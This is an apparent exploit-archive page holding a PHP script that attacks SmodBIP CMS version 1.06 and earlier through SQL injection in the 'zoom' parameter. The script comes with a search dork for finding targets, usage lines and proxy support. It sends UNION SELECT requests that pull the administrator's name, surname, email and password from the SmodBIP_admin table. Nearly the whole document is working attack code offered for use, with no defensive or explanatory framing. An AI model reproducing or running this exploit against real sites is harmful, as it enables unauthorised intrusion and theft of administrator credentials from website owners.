SmodBIP <= 1.06 (aktualnosci zoom) Remote SQL Injection Exploit

<? /* Autor:&nbsp;Kacper Contact:&nbsp;kacper1964@yahoo.pl Homepage:&nbsp;http://www.rahim.webd.pl/ Irc:&nbsp;irc.milw0rm.com:6667&nbsp;#devilteam&nbsp; Pozdro&nbsp;dla&nbsp;wszystkich&nbsp;z&nbsp;kanalu&nbsp;IRC&nbsp;oraz&nbsp;forum&nbsp;DEVIL&nbsp;TEAM. //dork:&nbsp;\"SmodBIP\"&nbsp;&&nbsp;\"Aktualno.ci\" SmodBIP&nbsp;<=&nbsp;1.06&nbsp;(aktualnosci&nbsp;zoom)&nbsp;Remote&nbsp;SQL&nbsp;Injection&nbsp;Exploit script&nbsp;homepage/download/demo:&nbsp;http://smod.pl/ */ if&nbsp;($argc<4)&nbsp;{ print_r(\' -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Usage:&nbsp;php&nbsp;\'.$argv[0].\'&nbsp;host&nbsp;path&nbsp;aktualnosci_module_id&nbsp;OPTIONS host:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;(ip/hostname) path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SmodBIP&nbsp;path aktualnosci_module_id:&nbsp;id&nbsp;number&nbsp;of&nbsp;aktualnosci&nbsp;module&nbsp;(Standard:&nbsp;11) Options: &nbsp;-p[port]:&nbsp;&nbsp;&nbsp;&nbsp;specify&nbsp;a&nbsp;port&nbsp;other&nbsp;than&nbsp;80 &nbsp;-P[ip:port]:&nbsp;specify&nbsp;a&nbsp;proxy Example: php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/SmodBIP/&nbsp;11 php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/SmodBIP/&nbsp;11&nbsp;-P1.1.1.1:80 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- \'); die; } error_reporting(7); ini_set(\"max_execution_time\",0); ini_set(\"default_socket_timeout\",5); function&nbsp;quick_dump($string) { &nbsp;&nbsp;$result=\'\';$exa=\'\';$cont=0; &nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=strlen($string)-1;&nbsp;$i++) &nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;if&nbsp;((ord($string[$i])&nbsp;<=&nbsp;32&nbsp;)&nbsp;|&nbsp;(ord($string[$i])&nbsp;>&nbsp;126&nbsp;)) &nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;.\";} &nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;\".$string[$i];} &nbsp;&nbsp;&nbsp;if&nbsp;(strlen(dechex(ord($string[$i])))==2) &nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;\".dechex(ord($string[$i]));} &nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;0\".dechex(ord($string[$i]));} &nbsp;&nbsp;&nbsp;$cont++;if&nbsp;($cont==15)&nbsp;{$cont=0;&nbsp;$result.=\" \";&nbsp;$exa.=\" \";} &nbsp;&nbsp;} &nbsp;return&nbsp;$exa.\" \".$result; } $proxy_regex&nbsp;=&nbsp;\'(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})\'; function&nbsp;wyslijpakiet($packet) { &nbsp;&nbsp;global&nbsp;$proxy,&nbsp;$host,&nbsp;$port,&nbsp;$html,&nbsp;$proxy_regex; &nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen(gethostbyname($host),$port); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;\'.$host.\':\'.$port;&nbsp;die; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;else&nbsp;{ $c&nbsp;=&nbsp;preg_match($proxy_regex,$proxy); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$c)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'Not&nbsp;a&nbsp;valid&nbsp;proxy...\';die; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;$parts=explode(\':\',$proxy); &nbsp;&nbsp;&nbsp;&nbsp;$parts[1]=(int)$parts[1]; &nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\"Connecting&nbsp;to&nbsp;\".$parts[0].\":\".$parts[1].\"&nbsp;proxy... \"; &nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen($parts[0],$parts[1]); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;proxy...\';die; } &nbsp;&nbsp;} &nbsp;&nbsp;fputs($ock,$packet); &nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$html=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fgets($ock); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;else&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$html=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((!feof($ock))&nbsp;or&nbsp;(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fread($ock,1); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;fclose($ock); } $host=$argv[1]; $path=$argv[2]; $aktualnosci_id=$argv[3]; $port=80; $proxy=\"\"; for&nbsp;($i=4;&nbsp;$i<$argc;&nbsp;$i++){ $temp=$argv[$i][0].$argv[$i][1]; if&nbsp;($temp==\"-p\") { &nbsp;&nbsp;$port=(int)str_replace(\"-p\",\"\",$argv[$i]); } if&nbsp;($temp==\"-P\") { &nbsp;&nbsp;$proxy=str_replace(\"-P\",\"\",$argv[$i]); } } if&nbsp;(($path[0]<>\'/\')&nbsp;or&nbsp;($path[strlen($path)-1]<>\'/\'))&nbsp;{die(\"Bad&nbsp;path!\");} if&nbsp;($proxy==\'\')&nbsp;{$p=$path;}&nbsp;else&nbsp;{$p=\'http://\'.$host.\':\'.$port.$path;} print&nbsp;\"SmodBIP&nbsp;SQL&nbsp;Injection&nbsp;Exploit&nbsp;by&nbsp;Kacper \"; $packet&nbsp;=\"POST&nbsp;\".$p.\"index.php?id=\".$aktualnosci_id.\"&zoom=-1+UNION+SELECT+0,Imie,2,3,4,5,6,7,8,9,10+from+SmodBIP_admin+where+Uprawnienia=1/*&nbsp;HTTP/1.0 \"; $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\"index.php \"; $packet.=\"Accept-Language:&nbsp;pl \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Connection:&nbsp;Close \"; wyslijpakiet($packet); sleep(3); $temp=explode(\'<h2>\',$html); $temp2=explode(\'</h2>\',$temp[1]); $imie_admina=$temp2[0]; echo&nbsp;\"Admin&nbsp;Name:&nbsp;\".$imie_admina.\" \"; $packet&nbsp;=\"POST&nbsp;\".$p.\"index.php?id=\".$aktualnosci_id.\"&zoom=-1+UNION+SELECT+0,Nazwisko,2,3,4,5,6,7,8,9,10+from+SmodBIP_admin+where+Uprawnienia=1/*&nbsp;HTTP/1.0 \"; $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\"index.php \"; $packet.=\"Accept-Language:&nbsp;pl \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Connection:&nbsp;Close \"; wyslijpakiet($packet); sleep(3); $temp=explode(\'<h2>\',$html); $temp2=explode(\'</h2>\',$temp[1]); $nazwisko_admina=$temp2[0]; echo&nbsp;\"Admin&nbsp;Surname:&nbsp;\".$nazwisko_admina.\" \"; $packet&nbsp;=\"POST&nbsp;\".$p.\"index.php?id=\".$aktualnosci_id.\"&zoom=-1+UNION+SELECT+0,Email,2,3,4,5,6,7,8,9,10+from+SmodBIP_admin+where+Uprawnienia=1/*&nbsp;HTTP/1.0 \"; $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\"index.php \"; $packet.=\"Accept-Language:&nbsp;pl \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Connection:&nbsp;Close \"; wyslijpakiet($packet); sleep(3); $temp=explode(\'<h2>\',$html); $temp2=explode(\'</h2>\',$temp[1]); $Email_admina=$temp2[0]; echo&nbsp;\"Admin&nbsp;E-Mail:&nbsp;\".$Email_admina.\" \"; $packet&nbsp;=\"POST&nbsp;\".$p.\"index.php?id=\".$aktualnosci_id.\"&zoom=-1+UNION+SELECT+0,Haslo,2,3,4,5,6,7,8,9,10+from+SmodBIP_admin+where+Uprawnienia=1/*&nbsp;HTTP/1.0 \"; $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\"index.php \"; $packet.=\"Accept-Language:&nbsp;pl \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Connection:&nbsp;Close \"; wyslijpakiet($packet); sleep(3); $temp=explode(\'<h2>\',$html); $temp2=explode(\'</h2>\',$temp[1]); $haslo_admina=$temp2[0]; echo&nbsp;\"Admin&nbsp;Password:&nbsp;\".$haslo_admina.\" \"; ?> &nbsp;